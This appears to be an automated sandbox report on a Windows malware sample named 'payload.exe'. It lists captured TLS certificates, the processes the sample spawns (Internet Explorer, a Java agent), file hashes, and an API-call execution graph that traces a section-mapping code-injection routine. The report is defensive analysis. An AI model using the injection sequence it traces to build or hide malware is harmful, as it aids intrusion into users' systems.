Aug 13, 2018 14:03:27.422796965 MESZ44349170152.199.19.161192.168.2.2CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IECN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEFri May 12 20:46:00 CEST 2000Tue May 13 01:59:00 CEST 2025[[ Version: V3 Subject: CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 2048 bits modulus: 20579176651421167987106471718888186309534186253587759121109122482694167416584428920295678216035822449451639581023765122994089008826314029843654807108803739729565431642116323937940944378450034252354609020536286175863324156219063038927409933070688727356676027216359532593504366119272034244698731524943132462329205729047681997715455240148827523651706429854757422624117805863121520494307655271426986078917217383478420381375139154341613794371303682232583316393601620034638044186782252195438345309455714637508276892061355357785328168602107026282695945834955006612147350315937204256563720794300123948598669913435346712336953 public exponent: 65537 Validity: [From: Fri May 12 20:46:00 CEST 2000, To: Tue May 13 01:59:00 CEST 2025] Issuer: CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE SerialNumber: [ 020000b9]Certificate Extensions: 3[1]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:3][2]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ Key_CertSign Crl_Sign][3]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: E5 9D 59 30 82 47 58 CC AC FA 08 54 36 86 7B 3A ..Y0.GX....T6..:0010: B5 04 4D F0 ..M.]]] Algorithm: [SHA1withRSA] Signature:0000: 85 0C 5D 8E E4 6F 51 68 42 05 A0 DD BB 4F 27 25 ..]..oQhB....O'%0010: 84 03 BD F7 64 FD 2D D7 30 E3 A4 10 17 EB DA 29 ....d.-.0......)0020: 29 B6 79 3F 76 F6 19 13 23 B8 10 0A F9 58 A4 D4 ).y?v...#....X..0030: 61 70 BD 04 61 6A 12 8A 17 D5 0A BD C5 BC 30 7C ap..aj........0.0040: D6 E9 0C 25 8D 86 40 4F EC CC A3 7E 38 C6 37 11 
...%..@O....8.7.0050: 4F ED DD 68 31 8E 4C D2 B3 01 74 EE BE 75 5E 07 O..h1.L...t..u^.0060: 48 1A 7F 70 FF 16 5C 84 C0 79 85 B8 05 FD 7F BE H..p..\..y......0070: 65 11 A3 0F C0 02 B4 F8 52 37 39 04 D5 A9 31 7A e.......R79...1z0080: 18 BF A0 2A F4 12 99 F7 A3 45 82 E3 3C 5E F5 9D ...*.....E..<^..0090: 9E B5 C8 9E 7C 2E C8 A4 9E 4E 08 14 4B 6D FD 70 .........N..Km.p00A0: 6D 6B 1A 63 BD 64 E6 1F B7 CE F0 F2 9F 2E BB 1B mk.c.d..........00B0: B7 F2 50 88 73 92 C2 E2 E3 16 8D 9A 32 02 AB 8E ..P.s.......2...00C0: 18 DD E9 10 11 EE 7E 35 AB 90 AF 3E 30 94 7A D0 .......5...>0.z.00D0: 33 3D A7 65 0F F5 FC 8E 9E 62 CF 47 44 2C 01 5D 3=.e.....b.GD,.]00E0: BB 1D B5 32 D2 47 D2 38 2E D0 FE 81 DC 32 6A 1E ...2.G.8.....2j.00F0: B5 EE 3C D5 FC E7 81 1D 19 C3 24 42 EA 63 39 A9 ..<.......$B.c9.]
Aug 13, 2018 14:03:27.423629999 MESZ44349171152.199.19.161192.168.2.2CN=*.vo.msecnd.netCN=Microsoft IT TLS CA 2, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=USFri Mar 30 19:48:56 CEST 2018Mon Mar 30 19:48:56 CEST 2020[[ Version: V3 Subject: CN=*.vo.msecnd.net Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 26650803979259295716290423693905296698157083325048498445836080201188299707993523769983022596768079645285384865155132965572416436152378172025499450880633264224755571468835296223137555283971797334879051618498098440929892959115038801729724039469239084562396320177233195067487817337082459981077208444076525818793397580249136338078721428618161201050325403922256394870562406690344296180719053188791769325712246232155686598548851946583469494216117938492274511053022075022710177237525565910648338744931738281978430913279296706457579042005546769662912351613258485613692711958886470421185755835262239469076692855817140222781347 public exponent: 65537 Validity: [From: Fri Mar 30 19:48:56 CEST 2018, To: Mon Mar 30 19:48:56 CEST 2020] Issuer: CN=Microsoft IT TLS CA 2, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US SerialNumber: [ 20000270 cc6d2533 6ca081b3 59000000 0270cc]Certificate Extensions: 10[1]: ObjectId: 1.3.6.1.4.1.311.21.10 Criticality=falseExtension unknown: DER encoded OCTET string =0000: 04 1A 30 18 30 0A 06 08 2B 06 01 05 05 07 03 02 ..0.0...+.......0010: 30 0A 06 08 2B 06 01 05 05 07 03 01 0...+.......[2]: ObjectId: 1.3.6.1.4.1.311.21.7 Criticality=falseExtension unknown: DER encoded OCTET string =0000: 04 31 30 2F 06 27 2B 06 01 04 01 82 37 15 08 87 .10/.'+.....7...0010: DA 86 75 83 EE D9 01 82 C9 85 1B 81 B5 9E 61 85 ..u...........a.0020: F4 EB 60 81 5D 84 D2 DF 42 82 E7 93 7A 02 01 64 ..`.]...B...z..d0030: 02 01 1D ...[3]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: caIssuers accessLocation: URIName: 
http://www.microsoft.com/pki/mscorp/Microsoft%20IT%20TLS%20CA%202.crt, accessMethod: ocsp accessLocation: URIName: http://ocsp.msocsp.com]][4]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: 91 9E 3B 44 6C 3D 57 9C 42 77 2A 34 D7 4F D1 CC ..;Dl=W.Bw*4.O..0010: 4A 97 2C DA J.,.]][5]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://mscrl.microsoft.com/pki/mscorp/crl/Microsoft%20IT%20TLS%20CA%202.crl, URIName: http://crl.microsoft.com/pki/mscorp/crl/Microsoft%20IT%20TLS%20CA%202.crl]]][6]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [1.3.6.1.4.1.311.42.1][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 27 68 74 74 70 3A 2F 2F 77 77 77 2E 6D 69 63 .'http://www.mic0010: 72 6F 73 6F 66 74 2E 63 6F 6D 2F 70 6B 69 2F 6D rosoft.com/pki/m0020: 73 63 6F 72 70 2F 63 70 73 scorp/cps]] ]][7]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ clientAuth serverAuth][8]: ObjectId: 2.5.29.15 Criticality=falseKeyUsage [ DigitalSignature Key_Encipherment Data_Encipherment][9]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: *.vo.msecnd.net DNSName: *.adn.azureedge.net DNSName: *.ads2.msads.net DNSName: *.aspnetcdn.com DNSName: *.azurecomcdn.net DNSName: *.azureedge.net DNSName: *.azureedge-test.net DNSName: *.cdn.skype.com DNSName: *.cdn.skype.net DNSName: *.cmsresources.windowsphone.com DNSName: *.cmsresources.windowsphone-int.com DNSName: *.dev.skype.com DNSName: *.fms.azureedge.net DNSName: *.microsoft-sbs-domains.com DNSName: *.secure.skypeassets.com DNSName: *.secure.skypeassets.net DNSName: *.wac.azureedge.net DNSName: *.wpc.azureedge.net DNSName: *.ec.azureedge.net DNSName: *.wpc.ec.azureedge.net DNSName: *.wac.ec.azureedge.net DNSName: *.adn.ec.azureedge.net DNSName: *.fms.ec.azureedge.net DNSName: ajax.microsoft.com DNSName: cdnads.msads.net DNSName: cdn-resources.windowsphone.com DNSName: 
cdn-resources-beta.windowsphone.com DNSName: ecnads1.msn.com DNSName: iecvlist.microsoft.com DNSName: images-cms-pn.windowsphone-int.com DNSName: images-cms-tst.windowsphone-int.com DNSName: lumiahelptipscdn.microsoft.com DNSName: lumiahelptipscdnqa.microsoft.com DNSName: lumiahelptipsmscdn.microsoft.com DNSName: lumiahelptipsmscdnqa.microsoft.com DNSName: montage.msn.com DNSName: mscrl.microsoft.com DNSName: r20swj13mr.microsoft.com DNSName: *.streaming.mediaservices.windows.net DNSName: *.origin.mediaservices.windows.net DNSName: download.sysinternals.com DNSName: amp.azure.net DNSName: rt.ms-studiosmedia.com DNSName: gtm.ms-studiosmedia.com DNSName: *.aisvc.visualstudio.com DNSName: *.cdn.powerbi.com DNSName: dist.asp.net DNSName: embed.powerbi.com DNSName: msitembed.powerbi.com DNSName: dxtembed.powerbi.com DNSName: *.cdn.powerappscdn.net DNSName: downloads.subscriptionsint.tfsallin.net DNSName: download.my.visualstudio.com DNSName: cdn.vsassets.io DNSName: cdnppe.vsassets.io DNSName: stream.microsoft.com DNSName: datafactory.azure.com DNSName: *.cortanaanalytics.com DNSName: do.skype.com DNSName: software-download.office.microsoft.com DNSName: software-download.microsoft.com DNSName: prss.centralvalidation.com DNSName: *.gallerycdn.vsassets.io DNSName: *.gallerycdnppe.vsassets.io DNSName: global.asazure.windows.net DNSName: download.learningdownloadcenter.microsoft.com DNSName: www.videobreakdown.com DNSName: www.breakdown.me DNSName: *.gallerycdntest.vsassets.io DNSName: agavecdn.o365weve-dev.com DNSName: agavecdn.o365weve-ppe.com DNSName: agavecdn.o365weve.com DNSName: download.visualstudio.com DNSName: *.Applicationinsights.net DNSName: *.Applicationinsights.io DNSName: *.Applicationinsights.microsoft.com DNSName: *.sfbassets.com DNSName: *.sfbassets.net DNSName: download.mono-project.com DNSName: *.streaming.media-test.windows-int.net DNSName: *.origin.mediaservices.windows-int.net DNSName: *.mp.microsoft.com DNSName: download.visualstudio.microsoft.com 
DNSName: software-download.coem.microsoft.com DNSName: cdn.wallet.microsoft-ppe.com DNSName: cdn.wallet.microsoft.com DNSName: vi.microsoft.com DNSName: *.nuget.org DNSName: *.nugettest.org DNSName: cdn.botframework.com DNSName: *.streaming.media.azure.net DNSName: *.streaming.media.azure-test.net DNSName: natick.research.microsoft.com DNSName: quotecenter.microsoft.com DNSName: quotecenter-ppe.microsoft.com DNSName: cdn.cloudappsecurity.com DNSName: *.yammer.com DNSName: *.videoindexer.ai DNSName: *.api.videoindexer.ai][10]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: CD 01 B0 7E 67 61 98 56 52 16 A4 D7 17 C9 AD AE ....ga.VR.......0010: 2A BC B0 76 *..v]]] Algorithm: [SHA256withRSA] Signature:0000: 3F 55 65 AB A9 07 00 4E 0C CB 83 3F 4B 18 6D 39 ?Ue....N...?K.m90010: 16 43 19 BD 48 3B BB CC 9A 13 AD 73 42 8B BA 09 .C..H;.....sB...0020: 72 2E 49 86 78 02 64 85 67 44 39 C7 36 A9 87 15 r.I.x.d.gD9.6...0030: E0 83 E8 AA D0 CA 2C 47 E3 C9 77 D4 08 C2 1E B6 ......,G..w.....0040: 92 AA 54 0B 2B CD 55 A2 C9 29 89 71 11 70 E2 D0 ..T.+.U..).q.p..0050: 52 1F EF 8A 70 83 7A 90 80 35 5F B6 91 D0 CA 18 R...p.z..5_.....0060: E5 04 AC 0B 70 B1 25 4A 7E 4D FA 76 63 FC 45 B8 ....p.%J.M.vc.E.0070: 13 BF 84 C0 A1 CC C9 A9 29 37 8E 70 56 62 05 71 ........)7.pVb.q0080: 18 78 94 DB 1B 10 5B 0E A3 6C 15 F2 B5 BD 49 A1 .x....[..l....I.0090: D9 05 64 42 19 F9 B0 B6 D9 7B 7E E9 04 1D 73 9F ..dB..........s.00A0: 32 08 DD D2 85 C8 70 05 A6 13 3F D0 32 F1 10 6A 2.....p...?.2..j00B0: A7 DF 48 7F C4 24 DB 8D 9A 36 4D 8B 5B 7E 9B FB ..H..$...6M.[...00C0: EA F1 CA E6 40 4C 65 48 11 BF 13 1B D8 BF 00 4B ....@LeH.......K00D0: ED BE BF 27 9F 19 48 26 79 73 92 69 68 48 D1 9F ...'..H&ys.ihH..00E0: FC 51 70 9D 1F A0 7E 1C 5A 87 D3 8C 4E 70 62 E0 .Qp.....Z...Npb.00F0: 56 2A 83 29 BE F6 59 92 57 4F 3D DC 71 8E 0A D4 V*.)..Y.WO=.q...0100: 08 FC EE C6 94 9A 5E 31 7C 27 5F 1E 6D 90 66 0A ......^1.'_.m.f.0110: 3E C3 90 20 48 3C 04 DF B6 2F 3E 70 C6 4A 60 E5 >.. 
H<.../>p.J`.0120: 20 B1 9B DF 48 2B 88 E5 33 76 FA 0E B5 5A 2D 2F ...H+..3v...Z-/0130: 71 47 05 80 C6 57 A0 14 B6 A5 35 56 9B B6 A6 20 qG...W....5V... 0140: 00 6C 70 4F 2F B6 AD BD F3 EA 5B 60 F5 14 ED 6B .lpO/.....[`...k0150: 6B 44 15 CE 91 2D 7F 36 11 3E 39 EB CC C3 DF A9 kD...-.6.>9.....0160: FB A8 9D 7F 64 94 A5 87 E0 7F 2F 0F 91 56 4E F5 ....d...../..VN.0170: F5 49 9F 9F 8E 6E 13 B4 94 7E 24 A6 B2 E1 F3 DA .I...n....$.....0180: 3E DE EC 5E FB 64 29 DC 57 F3 46 73 07 03 A2 69 >..^.d).W.Fs...i0190: 69 7A 01 0F 2C 72 11 8C 8E 41 DF 6B 93 09 B2 F0 iz..,r...A.k....01A0: DF B1 82 40 2E 1B FD 1C 22 DE EB 6C 2B 89 33 BE ...@...."..l+.3.01B0: 6C 14 2F FC ED 2E 3E B8 D7 B8 45 44 DE AC 64 FA l./...>...ED..d.01C0: 15 8E 95 BB 4E 04 04 75 3D 13 A2 1D 94 7A B8 8E ....N..u=....z..01D0: 24 6D CD 66 E7 40 7E E5 C3 4F BC 22 8A D7 78 A1 $m.f.@...O."..x.01E0: 7C 0A 95 87 55 CC CF 8F 41 57 91 98 E7 AA E7 DE ....U...AW......01F0: C5 C2 0C D1 A1 03 76 BC 82 C6 C9 9E 3F 98 43 7D ......v.....?.C.]
Aug 13, 2018 14:03:27.423629999 MESZ44349171152.199.19.161192.168.2.2CN=Microsoft IT TLS CA 2, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEFri May 20 14:51:57 CEST 2016Mon May 20 14:51:57 CEST 2024[[ Version: V3 Subject: CN=Microsoft IT TLS CA 2, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 4096 bits modulus: 647294255602325793990002513119693468857392867898417605410250896666240868552526284895128080800072075079541116694006108111424285769210952443117016108817512004416915652231910726180601295496484283455657703546650167672472095813058953881613183359786366741204887237778758654131517015592572803423794117451702755161544979434031590265341003857135228312611468237470025540692665622782242245418396439043641638694688252969318505934528611852331845685201979673767756215622457277048995475799862983198559683031746002361975577371668527079660623700395748659568646041541973621714023268935223403435124814495591465766470454743043858485541464708934243998176475016309920664622704013423283337532488437325584305269612425692156906642521785806736108836293408234401329760217850656597482737516435684644509149184860637949964770877674659801402449999763931813660784340254013505819744099600848977200865054274097501530563387171488283923635556233850167978272146006159159364253066097677840315992598562396543614479225118965642333219965644634595301995940368770892345795950122637528531630935913800079064090039488940652767821851441910089798494405128972383400235177579883092457976791664618121612668703609711139468476583630291006864328822405235915054059848188166737876217120001 public exponent: 65537 Validity: [From: Fri May 20 14:51:57 CEST 2016, To: Mon May 20 14:51:57 CEST 2024] Issuer: CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE SerialNumber: [ 0f2c10c9 5b06c093 7fb8d449 f83e8569]Certificate 
Extensions: 8[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://ocsp.digicert.com]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: E5 9D 59 30 82 47 58 CC AC FA 08 54 36 86 7B 3A ..Y0.GX....T6..:0010: B5 04 4D F0 ..M.]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:0][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl3.digicert.com/Omniroot2025.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.5.29.32.0][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 1C 68 74 74 70 73 3A 2F 2F 77 77 77 2E 64 69 ..https://www.di0010: 67 69 63 65 72 74 2E 63 6F 6D 2F 43 50 53 gicert.com/CPS]] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth OCSPSigning][7]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_CertSign Crl_Sign][8]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 91 9E 3B 44 6C 3D 57 9C 42 77 2A 34 D7 4F D1 CC ..;Dl=W.Bw*4.O..0010: 4A 97 2C DA J.,.]]] Algorithm: [SHA256withRSA] Signature:0000: 6C 7F EA 6A 6F CF 6B 5B C1 34 AC FF DC 0E E0 7D l..jo.k[.4......0010: 8B 13 17 E0 2F 4E 59 0E C4 03 B9 F4 05 29 65 47 ..../NY......)eG0020: AE 19 9A E8 54 F6 64 D5 D8 BD 06 E0 71 22 19 7B ....T.d.....q"..0030: CE 9A DD 79 8B DF 70 27 48 68 DB F7 6F 33 19 B5 ...y..p'Hh..o3..0040: 65 EB 9F 90 07 CC B8 47 39 7D 0F 51 13 91 0D 80 e......G9..Q....0050: D4 76 50 2B 85 07 60 6D 6D 59 9A 29 40 16 C6 C7 .vP+..`mmY.)@...0060: 0D E0 6A 57 4B 80 09 BF EF C7 4B 45 57 B3 94 AE ..jWK.....KEW...0070: D7 D2 74 0C 0F 01 83 E9 68 F1 E9 02 97 87 6A D8 ..t.....h.....j.0080: 6D 66 D5 6B 02 BC 50 48 A0 B2 23 77 89 DE 08 B9 mf.k..PH..#w....0090: 46 A3 14 F6 8C 0E 37 96 3D 89 A5 0F D2 32 42 E4 F.....7.=....2B.00A0: 2F 2F 43 5E 3F C9 1D DB 2A 24 34 79 A2 07 
22 8F //C^?...*$4y..".00B0: 85 48 5F C5 7E 6D 50 F4 34 2C 3B 91 06 BA 52 5A .H_..mP.4,;...RZ00C0: BD 66 8D 23 0C 4A B5 6A DE 33 49 E1 F8 99 5D 8F .f.#.J.j.3I...].00D0: 30 CD CB C0 85 C1 03 6C 68 E6 C7 5A D5 C9 D4 58 0......lh..Z...X00E0: 9A 37 3E AE 2E 32 07 0B 7B 4B 7E 7C 2B AD DF C3 .7>..2...K..+...00F0: 4C 91 39 7C 17 46 AB 7E 5B 29 6A A5 15 55 4A 2F L.9..F..[)j..UJ/]
Aug 13, 2018 14:03:27.423629999 MESZ44349171152.199.19.161192.168.2.2CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IECN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEFri May 12 20:46:00 CEST 2000Tue May 13 01:59:00 CEST 2025[[ Version: V3 Subject: CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 2048 bits modulus: 20579176651421167987106471718888186309534186253587759121109122482694167416584428920295678216035822449451639581023765122994089008826314029843654807108803739729565431642116323937940944378450034252354609020536286175863324156219063038927409933070688727356676027216359532593504366119272034244698731524943132462329205729047681997715455240148827523651706429854757422624117805863121520494307655271426986078917217383478420381375139154341613794371303682232583316393601620034638044186782252195438345309455714637508276892061355357785328168602107026282695945834955006612147350315937204256563720794300123948598669913435346712336953 public exponent: 65537 Validity: [From: Fri May 12 20:46:00 CEST 2000, To: Tue May 13 01:59:00 CEST 2025] Issuer: CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE SerialNumber: [ 020000b9]Certificate Extensions: 3[1]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:3][2]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ Key_CertSign Crl_Sign][3]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: E5 9D 59 30 82 47 58 CC AC FA 08 54 36 86 7B 3A ..Y0.GX....T6..:0010: B5 04 4D F0 ..M.]]] Algorithm: [SHA1withRSA] Signature:0000: 85 0C 5D 8E E4 6F 51 68 42 05 A0 DD BB 4F 27 25 ..]..oQhB....O'%0010: 84 03 BD F7 64 FD 2D D7 30 E3 A4 10 17 EB DA 29 ....d.-.0......)0020: 29 B6 79 3F 76 F6 19 13 23 B8 10 0A F9 58 A4 D4 ).y?v...#....X..0030: 61 70 BD 04 61 6A 12 8A 17 D5 0A BD C5 BC 30 7C ap..aj........0.0040: D6 E9 0C 25 8D 86 40 4F EC CC A3 7E 38 C6 37 11 
...%..@O....8.7.0050: 4F ED DD 68 31 8E 4C D2 B3 01 74 EE BE 75 5E 07 O..h1.L...t..u^.0060: 48 1A 7F 70 FF 16 5C 84 C0 79 85 B8 05 FD 7F BE H..p..\..y......0070: 65 11 A3 0F C0 02 B4 F8 52 37 39 04 D5 A9 31 7A e.......R79...1z0080: 18 BF A0 2A F4 12 99 F7 A3 45 82 E3 3C 5E F5 9D ...*.....E..<^..0090: 9E B5 C8 9E 7C 2E C8 A4 9E 4E 08 14 4B 6D FD 70 .........N..Km.p00A0: 6D 6B 1A 63 BD 64 E6 1F B7 CE F0 F2 9F 2E BB 1B mk.c.d..........00B0: B7 F2 50 88 73 92 C2 E2 E3 16 8D 9A 32 02 AB 8E ..P.s.......2...00C0: 18 DD E9 10 11 EE 7E 35 AB 90 AF 3E 30 94 7A D0 .......5...>0.z.00D0: 33 3D A7 65 0F F5 FC 8E 9E 62 CF 47 44 2C 01 5D 3=.e.....b.GD,.]00E0: BB 1D B5 32 D2 47 D2 38 2E D0 FE 81 DC 32 6A 1E ...2.G.8.....2j.00F0: B5 EE 3C D5 FC E7 81 1D 19 C3 24 42 EA 63 39 A9 ..<.......$B.c9.]

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

Behavior

System Behavior

General

Start time:14:02:45
Start date:13/08/2018
Path:C:\Users\user\Desktop\payload.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\payload.exe'
Imagebase:0x400000
File size:56832 bytes
MD5 hash:9CB0D02CBC93981015F6C050A0778CFD
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

General

Start time:14:03:27
Start date:13/08/2018
Path:C:\Program Files\Internet Explorer\iexplore.exe
Wow64 process (32bit):false
Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:0xfb0000
File size:815312 bytes
MD5 hash:CA1F703CD665867E8132D2946FB55750
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

General

Start time:14:03:28
Start date:13/08/2018
Path:C:\Program Files\Internet Explorer\iexplore.exe
Wow64 process (32bit):false
Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:3772 CREDAT:275457 /prefetch:2
Imagebase:0xfb0000
File size:815312 bytes
MD5 hash:CA1F703CD665867E8132D2946FB55750
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

General

Start time:14:03:28
Start date:13/08/2018
Path:C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exe
Wow64 process (32bit):false
Commandline:'C:\PROGRA~1\Java\JRE18~1.0_1\bin\ssvagent.exe' -new
Imagebase:0xad0000
File size:53312 bytes
MD5 hash:0953A0264879FD1E655B75B63B9083B7
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

Disassembly

Code Analysis

    Execution Graph

    Execution Coverage:14.6%
    Dynamic/Decrypted Code Coverage:100%
    Signature Coverage:25%
    Total number of Nodes:605
    Total number of Limit Nodes:82

    Graph

    execution_graph 3034 401000 HeapCreate 3035 401019 GetModuleHandleA GetCommandLineW 3034->3035 3036 40103e ExitProcess 3034->3036 3039 401070 3035->3039 3061 401aa8 CreateEventA 3039->3061 3041 401086 3042 401090 GetCursorPos 3041->3042 3043 4011ea 3041->3043 3046 4010a0 WaitForSingleObject 3042->3046 3044 4011f3 ExitProcess 3043->3044 3045 401030 HeapDestroy 3043->3045 3045->3036 3047 4010b2 GetCursorPos 3046->3047 3048 4010db 3046->3048 3068 401b1c lstrcpynA 3047->3068 3048->3043 3076 401c4a 3048->3076 3055 4011d6 3055->3043 3056 4011e2 GetLastError 3055->3056 3056->3043 3058 401128 3058->3055 3058->3058 3059 40119e GetCurrentThreadId GetCurrentThread 3058->3059 3094 40134b 3059->3094 3062 401b15 GetLastError 3061->3062 3063 401ac6 GetVersion 3061->3063 3064 401ad0 3063->3064 3065 401ad8 GetCurrentProcessId OpenProcess 3064->3065 3066 401b10 3064->3066 3067 401b05 3065->3067 3066->3041 3067->3041 3069 401b61 3068->3069 3070 4010d4 3069->3070 3071 401b99 VirtualAlloc 3069->3071 3070->3046 3070->3048 3071->3070 3072 401bc9 3071->3072 3073 401c10 3072->3073 3074 401bff memcpy 3072->3074 3075 401c17 VirtualFree 3073->3075 3074->3075 3075->3070 3077 401c62 GetModuleHandleA GetProcAddress 3076->3077 3078 401c87 3076->3078 3077->3078 3079 4010e8 3077->3079 3078->3079 3080 401c8b IsWow64Process 3078->3080 3081 402653 GetModuleHandleA 3079->3081 3080->3079 3082 40266f GetModuleHandleA 3081->3082 3083 4010fb 3081->3083 3085 40267d 3082->3085 3083->3055 3087 4026c5 3083->3087 3086 4026b5 3085->3086 3123 4027db 3085->3123 3086->3083 3092 402701 3087->3092 3089 402770 3090 40276e 3089->3090 3091 40279e memcpy 3089->3091 3090->3058 3091->3090 3092->3089 3092->3090 3128 401046 HeapAlloc 3092->3128 3129 40105b HeapFree 3092->3129 3096 401373 3094->3096 3095 4013a0 3095->3055 3096->3095 3100 4013bb 3096->3100 3171 401046 HeapAlloc 3096->3171 3101 4013c4 3100->3101 3130 4015e5 NtCreateSection 3100->3130 3101->3095 3107 401585 memset 3101->3107 3102 401555 3103 401570 
3102->3103 3104 40155e NtUnmapViewOfSection RtlNtStatusToDosError 3102->3104 3103->3101 3106 401576 CloseHandle 3103->3106 3104->3103 3106->3101 3182 40105b HeapFree 3107->3182 3108 40144a 3108->3102 3140 4016a4 3108->3140 3112 401475 memcpy 3114 401481 memcpy 3112->3114 3115 4014d6 3114->3115 3116 40151f 3115->3116 3117 401512 3115->3117 3147 401203 3116->3147 3172 4012ac 3117->3172 3120 40151d 3120->3102 3121 40152c memcpy 3120->3121 3159 4022ad 3121->3159 3124 4027e7 3123->3124 3125 4028d4 3124->3125 3126 4028b3 lstrlenA 3124->3126 3127 4028a7 lstrcmp 3124->3127 3125->3085 3126->3124 3127->3124 3128->3092 3129->3092 3131 401680 RtlNtStatusToDosError 3130->3131 3132 40164a 3130->3132 3134 401679 3131->3134 3183 4015a6 NtMapViewOfSection RtlNtStatusToDosError 3132->3183 3136 40141a 3134->3136 3137 401692 ZwClose 3134->3137 3135 401658 3135->3134 3138 40165e memset 3135->3138 3136->3102 3139 4015a6 NtMapViewOfSection RtlNtStatusToDosError 3136->3139 3137->3136 3138->3134 3139->3108 3141 4016e7 3140->3141 3142 401711 memcpy 3141->3142 3143 4016f2 memcpy 3141->3143 3144 401721 3142->3144 3143->3144 3145 40174e memcpy 3144->3145 3146 401463 3144->3146 3145->3144 3146->3102 3146->3112 3146->3114 3148 40122e GetModuleHandleA 3147->3148 3149 401214 3147->3149 3150 401242 3148->3150 3151 4012a5 3148->3151 3149->3148 3152 401292 memcpy 3149->3152 3184 401c9f 3150->3184 3151->3120 3152->3151 3155 401c9f 10 API calls 3156 401266 3155->3156 3156->3151 3157 401c9f 10 API calls 3156->3157 3158 401280 3157->3158 3158->3151 3158->3152 3214 401046 HeapAlloc 3159->3214 3161 4022c2 3162 402311 3161->3162 3163 4022c8 memset 3161->3163 3162->3102 3164 402301 3163->3164 3165 4022ee 3163->3165 3215 40218d memset 3164->3215 3165->3164 3167 4022f7 3165->3167 3233 40203c memset 3167->3233 3170 4022ff 3244 40105b HeapFree 3170->3244 3171->3100 3173 4012bc 3172->3173 3174 40244e 16 API calls 3173->3174 3175 401332 memcpy 3173->3175 3176 4012e7 3174->3176 3177 401345 3175->3177 3176->3177 
3178 40244e 16 API calls 3176->3178 3177->3120 3179 401304 3178->3179 3179->3177 3180 40244e 16 API calls 3179->3180 3181 401321 3180->3181 3181->3175 3181->3177 3182->3095 3183->3135 3197 402526 3184->3197 3187 40124c 3187->3151 3187->3155 3188 4027db 2 API calls 3191 401cc7 3188->3191 3189 401d3a 3209 40105b HeapFree 3189->3209 3191->3189 3192 401cdc CreateFileA 3191->3192 3192->3189 3193 401cfd SetFilePointer 3192->3193 3194 401d31 CloseHandle 3193->3194 3195 401d0b ReadFile 3193->3195 3194->3189 3195->3194 3196 401d23 3195->3196 3196->3194 3210 401046 HeapAlloc 3197->3210 3199 40253b 3200 402541 GetModuleFileNameA 3199->3200 3201 401cb5 3199->3201 3202 402572 3200->3202 3203 402553 3200->3203 3201->3187 3201->3188 3202->3201 3205 402584 GetLastError 3202->3205 3208 40257d 3202->3208 3203->3200 3203->3202 3211 40105b HeapFree 3203->3211 3212 401046 HeapAlloc 3203->3212 3213 40105b HeapFree 3205->3213 3208->3201 3209->3187 3210->3199 3211->3203 3212->3203 3213->3208 